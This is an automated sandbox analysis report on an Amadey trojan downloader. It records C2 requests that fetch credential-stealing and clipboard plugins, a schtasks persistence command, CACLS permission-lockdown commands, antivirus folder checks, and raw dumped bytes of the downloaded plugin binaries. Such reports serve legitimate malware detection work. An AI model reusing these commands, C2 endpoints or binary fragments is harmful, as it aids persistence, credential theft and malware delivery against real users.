popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

csrsv.exe

Ave Maria WARZONE RAT UPX Admin Tool (Sysinternals etc ...) Malicious Library Malicious Packer PE64 DLL OS Processor Check JPEG Format PE32 PE File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 May 17, 2023, 9:31 a.m. May 17, 2023, 9:33 a.m.
Size 211.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 13c6b003e4cd8319299a50a51e14a222
SHA256 28f5e5e43a67a48c6a41f9814a50b6faf5d20dfee6b17e867429efca82394681
CRC32 A8C8C3B9
ssdeep 6144:tWh1VL9EWeJanEYL7OuuT7Ujz41FiPRL:tg1VdSYL3uT7e0KF
PDB Path D:\Mktmp\Amadey\Release\Amadey.pdb
Yara
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Malicious_Packer_Zero - Malicious Packer

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
95.214.26.53 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "oneetx.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0
pdb_path D:\Mktmp\Amadey\Release\Amadey.pdb
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
Save+0x8d733 Main-0x1478d cred64+0x91b73 @ 0x7fef2b51b73
Save+0x8f34b Main-0x12b75 cred64+0x9378b @ 0x7fef2b5378b
Save+0x903d3 Main-0x11aed cred64+0x94813 @ 0x7fef2b54813
Save+0x9077f Main-0x11741 cred64+0x94bbf @ 0x7fef2b54bbf
Save+0xa18a8 Main-0x618 cred64+0xa5ce8 @ 0x7fef2b65ce8
Main+0x65 cred64+0xa6365 @ 0x7fef2b66365
rundll32+0x2f42 @ 0xff312f42
rundll32+0x3b7a @ 0xff313b7a
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521

exception.instruction_r: 42 38 3c 00 75 f7 48 8b d0 48 8d 4c 24 50 e8 fa
exception.instruction: cmp byte ptr [rax + r8], dil
exception.exception_code: 0xc0000005
exception.symbol: Save+0x8d733 Main-0x1478d cred64+0x91b73
exception.address: 0x7fef2b51b73
registers.r14: 0
registers.r15: 0
registers.rcx: 1099511627775
registers.rsi: 0
registers.r10: 17
registers.rbx: 0
registers.rsp: 1374720
registers.r11: 1369616
registers.r8: 0
registers.r9: 257711013897
registers.rdx: 3454000
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1
registers.r13: 0
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://95.214.26.53/J84hHFuefh2/index.php?scr=1
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://95.214.26.53/J84hHFuefh2/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://95.214.26.53/J84hHFuefh2/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://95.214.26.53/J84hHFuefh2/Plugins/clip64.dll
request POST http://95.214.26.53/J84hHFuefh2/index.php?scr=1
request POST http://95.214.26.53/J84hHFuefh2/index.php
request GET http://95.214.26.53/J84hHFuefh2/Plugins/cred64.dll
request GET http://95.214.26.53/J84hHFuefh2/Plugins/clip64.dll
request POST http://95.214.26.53/J84hHFuefh2/index.php?scr=1
request POST http://95.214.26.53/J84hHFuefh2/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 3044
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3044
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1236
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000007390000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa1b7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7398f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x746a0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73cd1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73c21000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x739a1000
process_handle: 0xffffffff
1 0 0
description oneetx.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds
file C:\Users\test22\AppData\Roaming\27d75989acd3e0\clip64.dll
file C:\Users\test22\AppData\Roaming\27d75989acd3e0\cred64.dll
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\6fd2e6071d" /P "test22:N"&&CACLS "..\6fd2e6071d" /P "test22:R" /E&&Exit
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe" /F
file C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe
file C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe
file C:\Users\test22\AppData\Roaming\27d75989acd3e0\clip64.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\6fd2e6071d" /P "test22:N"&&CACLS "..\6fd2e6071d" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\27d75989acd3e0\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\27d75989acd3e0\clip64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $‘†ÕçsOÕçsOÕçsOŽwNÇçsOŽpNÞçsOŽvNeçsOŠvNçsOŠwNÚçsOŠpNÜçsOŽrNØçsOÕçrOiçsON‰zNÑçsON‰sNÔçsON‰ŒOÔçsON‰qNÔçsORichÕçsOPEd†)eRdð"  ¾8 €0` ­Xø­ŒøPd›ÌpÝpàÝ0 À.textH   `.rdataܑ0 ’ @@.dataLuÐ<ª@À.pdatad›Pœæ@@_RDATA”ð‚@@.rsrcø„@@.reloc̆@BHƒì(A¸ HG»H  êècl H ló HƒÄ(éŸï ÌÌÌHƒì(A¸ H?»H ïè3l H ¬ó HƒÄ(éoï ÌÌÌHƒì(A¸H3»H  ïèl H ìó HƒÄ(é?ï ÌÌÌHƒì(A¸ H»H ðêèÓk H ,ô HƒÄ(éï ÌÌÌHƒì(A¸H»H `îè£k H lô HƒÄ(éßî ÌÌÌHƒì(A¸ HïºH 0éèsk H ¬ô HƒÄ(é¯î ÌÌÌHƒì(E3ÀHÂH £îèFk H ïô HƒÄ(é‚î ÌÌÌÌÌÌHƒì(E3ÀH’H Óîèk H /õ HƒÄ(éRî ÌÌÌÌÌÌHƒì(E3ÀHbH #êèæj H oõ HƒÄ(é"î ÌÌÌÌÌÌHƒì(E3ÀH2H 3èè¶j H ¯õ HƒÄ(éòí ÌÌÌÌÌÌHƒì(A¸H'ºH €èèƒj H ìõ HƒÄ(é¿í ÌÌÌHƒì(A¸HºH PéèSj H ,ö HƒÄ(éí ÌÌÌHƒì(A¸ H÷¹H ëè#j H lö HƒÄ(é_í ÌÌÌHƒì(A¸H×¹H ëèói H ¬ö HƒÄ(é/í ÌÌÌHƒì(A¸H³¹H €éèÃi H ìö HƒÄ(éÿì ÌÌÌHƒì(A¸H¹H Pêè“i H ,÷ HƒÄ(éÏì ÌÌÌHƒì(A¸Hw¹H ìèci H l÷ HƒÄ(éŸì ÌÌÌHƒì(A¸ HW¹H pìè3i H ¬÷ HƒÄ(éoì ÌÌÌHƒì(A¸LH?¹H àèèi H ì÷ HƒÄ(é?ì ÌÌÌHƒì(A¸H_¹H 0æèÓh H ,ø HƒÄ(éì ÌÌÌHƒì(A¸dHO¹H  íè£h H lø HƒÄ(éßë ÌÌÌHƒì(A¸H‡¹H Pìèsh H ¬ø HƒÄ(é¯ë ÌÌÌHƒì(A¸Ho¹H `êèCh H ìø HƒÄ(éë ÌÌÌHƒì(A¸ H_¹H °åèh H ,ù HƒÄ(éOë ÌÌÌHƒì(A¸ H?¹H àêèãg H lù HƒÄ(éë ÌÌÌHƒì(A¸(H¹H péè³g H ¬ù HƒÄ(éïê ÌÌÌHƒì(A¸ H¹H  ëèƒg H ìù HƒÄ(é¿ê ÌÌÌHƒì(A¸ Hÿ¸H ðìèSg H ,ú HƒÄ(éê ÌÌÌHƒì(A¸H߸H @êè#g H lú HƒÄ(é_ê ÌÌÌHƒì(A¸H¿¸H Pëèóf H ¬ú HƒÄ(é/ê ÌÌÌHƒì(A¸ H¯¸H çèÃf H ìú HƒÄ(éÿé ÌÌÌHƒì(A¸,H¸H Ðçè“f H ,û HƒÄ(éÏé ÌÌÌHƒì(A¸H¸H àæècf H lû HƒÄ(éŸé ÌÌÌHƒì(A¸ H¸H 0êè3f H ¬û HƒÄ(éoé ÌÌÌHƒì(A¸$H_¸H €êèf H ìû HƒÄ(é?é ÌÌÌHƒì(A¸HW¸H °çèÓe H ,ü HƒÄ(éé ÌÌÌHƒì(A¸H?¸H àâè£e H lü HƒÄ(éßè ÌÌÌHƒì(A¸H/¸H ðçèse H ¬ü HƒÄ(é¯è ÌÌÌHƒì(A¸ H¸H àäèCe H ìü HƒÄ(éè ÌÌÌHƒì(A¸ Hÿ·H èèe H ,ý HƒÄ(éOè ÌÌÌHƒì(A¸ H÷·H Àåèãd H lý HƒÄ(éè ÌÌÌHƒì(A¸ H·H ãè³d H ¬ý HƒÄ(éïç ÌÌÌHƒì(A¸H¿·H åèƒd H ìý HƒÄ(é¿ç ÌÌÌHƒì(A¸H§·H pâèSd H ,þ HƒÄ(éç ÌÌÌHƒì(A¸ H‡·H Àèè#d H lþ HƒÄ(é_ç ÌÌÌHƒì(A¸LH/´H Påèóc H ¬þ HƒÄ(é/ç ÌÌÌHƒì(A¸H7·H @åèÃc H ìþ HƒÄ(éÿæ ÌÌÌHƒì(A¸dH?´H ðåè“c H ,ÿ HƒÄ(éÏæ ÌÌÌHƒì(A¸Hç¶H €èècc H lÿ HƒÄ(éŸæ ÌÌÌHƒì(A¸H϶H pçè3c H ¬ÿ HƒÄ(éoæ ÌÌÌHƒì(A¸ H·¶H åèc H ìÿ HƒÄ(é?æ ÌÌÌHƒì(A¸H—¶H 0âèÓb H , HƒÄ(éæ ÌÌÌHƒì(A¸Ho¶H àçè£b H l HƒÄ(éßå ÌÌÌHƒì(A¸HG¶H äèsb H ¬ HƒÄ(é¯å ÌÌÌHƒì(A¸H¶H €âèCb H ì HƒÄ(éå ÌÌÌHƒì(A¸HÿµH Ðàèb H , HƒÄ(éOå ÌÌÌHƒì(A¸?H/¶H äèãa H l HƒÄ(éå ÌÌÌH É éå ÌÌÌÌH ) éå ÌÌÌÌH ‰ éðä ÌÌÌÌH é éàä ÌÌÌÌH I éÐä ÌÌÌÌHƒì(E3ÀHâH àèfa H  HƒÄ(é¢ä ÌÌÌÌÌÌH é éä ÌÌÌÌH I é€ä ÌÌÌÌH © épä ÌÌÌÌH  é`ä ÌÌÌÌH i éPä Hƒì(H ¹ïè¤í H ¹ HƒÄ(é0ä H µ é$ä H  éä H 9 é ä Hƒì(H Eóè`í H e HƒÄ(éìã ¸ÃÌÌÌÌÌÌÌÌÌÌH‰\$H‰l$H‰t$ W
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyá–å~Lyá–â~Ryá–ä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPEL*eRdà! ތ>ð°@ Jœ<K<€øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD` D@À.rsrcø€P@@.relocTR@Bj h¨<¹phè?#hêèŒ*YÃÌÌÌj8hÌ<¹ˆhè#h`êèl*YÃÌÌÌj8hÌ<¹ hèÿ"hÀêèL*YÃÌÌÌj8hÌ<¹¸hèß"h ëè,*YÃÌÌÌj8h=¹Ðhè¿"h€ëè *YÃÌÌÌj0hD=¹èhèŸ"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌh€h°=¹iè\"h ìè©)YÃj?h€>¹0iè?"híèŒ)YÃÌÌ̋ÁÂÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèÂ2ƒÄ‹Æ^]ÂÌÌ̋I¸|<…ÉEÁÃÌÌU‹ìV‹ñFÇ”ñPèó2ƒÄöEt j Vè«%ƒÄ‹Æ^]AÇ”ñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀ‹ÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌU‹ìƒì MôèÒÿÿÿhˆJEôPè›2ÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèò1ƒÄÇìñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPè²1ƒÄÇ ñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹ZVWQS‹ñè‹=€h3É3À‰}ü…Û~53Ò;NjþEЃ=„h¸phCphƒ~r‹>ŠˆA‹}üB;Ë|˃~r‹_Æ‹Æ^[‹å]Ã_Æ‹Æ^[‹å]ÃÌÌÌÌÌU‹ìƒìSVW‹ò‹ùQ‰}ô‹FP‰Eðè“3ۉ]ø9]ðŽ)Dƒ~‹Ær‹¾Pè¯KƒÄ…Àu-‹N‹Æƒùr‹€< t‹Æƒùr‹ƒ‹Ïr‹Šé̃~‹Ær‹‹=@i3ҋ Di…ÿt+ŠˆEÿfDŠ]ÿƒù¸0iC0i8‹]øtB;×ráƒÊÿ‹E‹Èƒxr‹3À…ÿt.Š ˆMÿDƒ=Di¹0iŠ]ÿC 0i8‹]øt@;Çr݃Èÿƒ=Di¹0iC 0i‰Mì‹Mô‰Møƒyr‹ ‰Mø‹Ï+ȍ 3Ò÷÷‹Mì‹}ôŠ ‹MøˆC‰]ø;]ðŒÜþÿÿƒr‹Æ‹Ç_^[‹å]ÃÆ‹Ç_^[‹å]ÃÌÌÌÌÌÌÌÌÌÌU‹ìƒì@SVW‹Ù‹òQMĉ]ôèçýÿÿEċÖPMÜèYþÿÿhÇCÇCÆè°"‹Ø¹ƒÈÿ‰]ø‹ûƒÄ ó«3Ò„¾Š8>‰‹Bƒú@|ð‹Uì3ö3ۍ~ø…ÒtA‹Møƒ}ðEÜCEܾ‹ƒøÿt'ÁæðƒÇx‹Ï‹ÆÓø‹MôPè‹Uìƒï‹MøC;Úr‹Eø…ÀthPèð!ƒÄ‹Uðƒúr(‹MÜB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwVRQèÀ!ƒÄ‹UØÇEìÇEðÆE܃úr(‹MÄB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQè~!ƒÄ‹Eô_^[‹å]Ãè›GÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì4‹E0SVW3ÿÆEè¾…À„‹]ÇEàÇEäÆEÐ;Ç‚´+ǍMÐ;ÃB؃}4E CE SÇPèƒþr.‹MèV‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡hRQè× ƒÄMЃ}Uó~EàEèCUƒ}ä‹uà‹]f~ÉMèCÁfÖEø;óu\ƒîr‹; uƒÀƒÂƒîsïƒþü„îŠ: u7ƒþý„ߊH:Ju&ƒþþ„ΊH:Juƒþÿ„½Š@:B„±‹E0G‹uü;ø‚õþÿÿ3ÿ‹Uƒþr/‹MèF‹Áþr‹IüƒÆ#+ÁƒÀüƒø‡’VQè ‹UƒÄ‹Eƒør'H‹Âùr‹RüƒÁ#+ƒÀüƒøw`QRèσċU4ÇEÇEÆEƒúr3‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwë ‹uüGéWÿÿÿRQ肃ċÇ_^[‹å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹]V‹ñ‰]üWjhÀ>ÇFÇFÆèD3ÿ…Û~1ƒ}ECEŠ8S¿C €ú¶È¶ÃGȶÁ‹ÎPèG;}ü|ϋUƒúr(‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèуÄ_‹Æ^[‹å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì0VWj$hÄ>MÐÇEàÇEäÆEÐè—‹E…Àu3öéÇ3ÿ…À„¸ÇEøÇEüÆEè;Ç‚F+ǹ;ÁBȃ}ECEQǍMèPèBƒìEЋÌPètƒìEè‹ôƒì‹ÌPèa‹ÎèªþÿÿƒÄè¢üÿÿ‹UüƒÄ0…À„šƒúr,‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡¹RQèǃċEG;ø‚Hÿÿÿ¾‹Uäƒúr(‹MÐB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwxRQ膃ċUƒúr^‹MB‹ÁúrF‹IüƒÂ#+ÁƒÀüƒøwHë4ƒúr(‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw#RQè1ƒÄ3öétÿÿÿRQè ƒÄ_‹Æ^‹å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌU‹ìQ‹E‹U‹MV…À„‚S@WPè] ƒÄMƒ}‹Ø‹ÓCM+ъIˆD ÿ„Àuó‹óNŠF„Àuù+ñFVjÿðV‹øSWÿðPèÇ5ƒÄ WÿðjÿñÿñWjÿñÿ ñ‹U‹M_[^ƒúr%B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèAƒÄ‹å]ÃèdBÌÌÌÌU‹ìƒì$SVW‹ùjÇGÇGÆÿñ…À„‡j ÿ$ñ‹Ø‰]ü…Û„lSÿð‰Eô…À„SjjjjjÿPjhéýÿ ð‹ð‰uø…öŽ.‹WN;Êw‰O‹Çƒr‹ÆëF‹G‹Ù+Ú+Â;Øw%ƒ‹Ç‰Or‹S4jVèE,ÆƒÄ ‹uøëQSÆEø‹ÏÿuøS訋]üƒ‹Çr‹jjVPjÿÿuô
request_handle: 0x00cc000c
1 1 0
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe" /F
host 95.214.26.53
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\6fd2e6071d" /P "test22:N"&&CACLS "..\6fd2e6071d" /P "test22:R" /E&&Exit
cmdline CACLS "..\6fd2e6071d" /P "test22:N"
cmdline cmd /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\6fd2e6071d" /P "test22:N"&&CACLS "..\6fd2e6071d" /P "test22:R" /E&&Exit
cmdline CACLS "..\6fd2e6071d" /P "test22:R" /E
cmdline CACLS "oneetx.exe" /P "test22:R" /E
cmdline CACLS "oneetx.exe" /P "test22:N"
Bkav W32.AIDetectMalware
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Barys.321153
McAfee Downloader-FCND!13C6B003E4CD
Cylance unsafe
Sangfor Trojan.Win32.Save.a
Cybereason malicious.3e4cd8
Arcabit Trojan.Barys.D4E681
BitDefenderTheta Gen:NN.ZexaF.36196.nuW@aWbUXkfi
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/TrojanDownloader.Amadey.A
Cynet Malicious (score: 100)
APEX Malicious
ClamAV Win.Malware.Doina-10001799-0
Kaspersky UDS:Trojan-Downloader.Win32.Deyma.gen
BitDefender Gen:Variant.Barys.321153
Avast Win32:BotX-gen [Trj]
Tencent Win32.Trojan.Agen.Ktgl
Emsisoft Gen:Variant.Barys.321153 (B)
F-Secure Heuristic.HEUR/AGEN.1319380
VIPRE Gen:Variant.Barys.321153
McAfee-GW-Edition BehavesLike.Win32.Downloader.dh
FireEye Generic.mg.13c6b003e4cd8319
Sophos Mal/Generic-R
SentinelOne Static AI - Malicious PE
Avira HEUR/AGEN.1319380
Microsoft Trojan:Win32/Amadey.AY!MTB
ZoneAlarm UDS:Trojan-Downloader.Win32.Deyma.gen
GData Gen:Variant.Barys.321153
Google Detected
AhnLab-V3 Malware/Win.Trojanspy.C5238800
ALYac Gen:Variant.Barys.321153
MAX malware (ai score=83)
Panda Trj/GdSda.A
Rising Trojan.Generic@AI.100 (RDML:1sWZhubuURj7J4Ghb6pcQw)
Ikarus Trojan-Downloader.Win32.Amadey
MaxSecure Trojan.Malware.121218.susgen
Fortinet W32/Injector.EGTS!tr
AVG Win32:BotX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)